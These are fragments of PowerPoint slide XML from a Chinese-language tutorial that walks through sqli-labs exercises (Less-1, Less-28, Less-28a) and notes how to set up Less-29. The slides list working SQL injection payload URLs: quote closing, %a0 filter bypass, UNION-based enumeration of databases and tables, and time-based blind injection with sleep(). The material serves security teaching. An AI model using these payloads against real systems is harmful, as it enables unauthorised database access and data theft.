              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>我们在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>命令行中执行以下命令：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> 1. select * from users ;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>显示所有的数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>2. select true ;   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>返回结果是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，也就是代表正确</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>3. select false;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>返回结果是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，代表着错误</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>4. select (2  and 1=2); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>返回结果是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>5. select (2  or 1=2);  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>返回结果是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>6. select * from users where id=(1); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>此时返回第一列数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>7. select * from users where id=(true); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>此时返回也是第一列</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>以上问题说明，我们的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>值处理有问题，正确的语句应该是：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SELECT * FROM users WHERE id=('1'||'1'='2') LIMIT 0,1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31098597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2000" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://47.100.118.240:8888/Less-28/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>显示正常</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://47.100.118.240:8888/Less-28/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>此时显示不正常，说明可能存在注入漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>3. http://47.100.118.240:8888/Less-28/?id=1‘)   ;%00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>通过我们添加的代码可以将单引号进行补全。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>4. http://47.100.118.240:8888/Less-28/?id=1‘)  %a0 order  %a0  by %a0  3 ;%00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>order by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>%a0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>组合得到一共有三列</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>5. http://47.100.118.240:8888/Less-28/?id=1111‘)  %a0 union   %a0  select  %a0  1,2,3 ;%00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>此时可以得到回显位。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>6. http://47.100.118.240:8888/Less-28/?id=1111‘)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获得所有的库，与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>less-27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>基本相同。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>7. http://47.100.118.240:8888/Less-28/?id=111‘)  %a0   union %a0   select %a0  1,2,3    ||  (’1‘) = (‘1  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>我们也可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>来闭合，这种是不使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>;%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>的情况。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49089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48956"/>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2000" dirty="0"/>
              <a:t>法二：基于时间的盲注</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>1. http://47.100.118.240:8888/Less-28/?id=1')  %a0   %26%26 if( length(database())</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>1, 1, sleep(5)    ) ;%00 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>2. http://47.100.118.240:8888/Less-28/?id=1')  %a0   %26%26 if( length(database())&gt;1, 1, sleep(5)    )  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%26%26  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>('1')=(‘1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>这两种都是可以的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2698530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48955"/>
            <a:ext cx="10131425" cy="303747"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-28a_01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2000" dirty="0"/>
              <a:t>为了测试方便，我们在代码中加入：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>echo $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>echo "&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://47.100.118.240:8888/Less-28a/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>此时显示正常</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://47.100.118.240:8888/Less-28a/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>有报错，可能存在注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>3. http://47.100.118.240:8888/Less-28a/?id=1‘)  %a0 order  %a0  by %a0  3 ;%00  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>order</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>语句得到一共有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>列。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>4. http://47.100.118.240:8888/Less-28a/?id=1111‘) %a0 union   %a0  select  %a0  1,2,3 ;%00  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>此时得到数据可以显示的位置。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>5. http://47.100.118.240:8888/Less-28a/?id=1111‘)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得到所有的库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>其余的操作和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>less-27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>基本无异。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="407095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94854" y="1219198"/>
            <a:ext cx="11402291" cy="4904510"/>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/Less-1/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>’     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查看是否有注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2.   http://127.0.0.1/sqli/Less-1/?id=1‘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http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,database()--+  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查看当前数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>5. http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,schema_name from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> limit 4,1--+  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查看数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，或者是：   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>http://127.0.0.1/sqli/Less-1/?id=-1’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查看所有的数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>6. http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,table_name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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查表，或者是：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>http://127.0.0.1/sqli/Less-1/?id=-1’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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2449308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71533"/>
            <a:ext cx="10131425" cy="303747"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-28a_02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1800" dirty="0"/>
              <a:t>法二：基于时间的盲注</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1. http://47.100.118.240:8888/Less-28a/?id=11111') %a0  or  %a0   if( length(database())=8, 1, sleep(5)    ) --+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>或者是</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2. http://47.100.118.240:8888/Less-28a/?id=1‘) %a0  and  %a0   if( length(database())=8, 1, sleep(5)    ) --+  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>此时要确保前面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>值是可以查到的，不能使用一个不存在的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>值。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2566530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环境搭建</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en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>中是无法正常使用第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>29</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>关的，因为需要搭建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>服务</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>我们可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>jspstudy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>在本地搭建，端口设置为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>8080</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>phpstudy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>端口设置为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>中的文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>index.jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>文件的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>指向位置到你安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>-labs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>less29</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>下</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E01817F-F5C4-46CA-BA64-F181785900F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1151170" y="4959927"/>
            <a:ext cx="9352613" cy="1401417"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="633199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补充知识</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器两层架构</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zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>参考链接：</a:t>
            </a:r>
            <a:r>
